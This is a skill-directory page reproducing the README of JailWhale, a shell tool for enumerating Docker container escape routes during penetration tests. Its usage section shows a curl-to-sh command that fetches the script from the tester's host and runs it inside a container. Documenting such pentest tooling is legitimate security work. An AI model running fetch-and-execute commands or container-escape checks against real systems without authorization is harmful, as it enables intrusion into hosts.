SkillAgentSearch skills...

JailWhale

Docker container escape enumeration tool.

Install / Use

/learn @eversinc33/JailWhale
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

JailWhale

Docker escape enumeration tool to be used when you end up in a docker container during a penetration test. I tried to minimize the dependencies, so a common linux-based system with sh should be able to run JailWhale. Further checks and methods to be added, when I encounter new techniques in CTFs (pull requests welcome).

Usage

# On your host
python -m http.server 8080
# In the container
curl http://<YOUR_IP>:8080/JailWhale.sh | sh

Sample Output

<img src="doc/JailWhale.png">

TODO

  • More CVE-checks
  • More hints on exploiting capabilities
  • Add other techniques

Credits

Much love to https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout for documenting various techniques

View on GitHub
GitHub Stars12
CategoryDevelopment
Updated2mo ago
Forks1

Languages

Shell

Security Score

75/100

Audited on Jan 27, 2026

No findings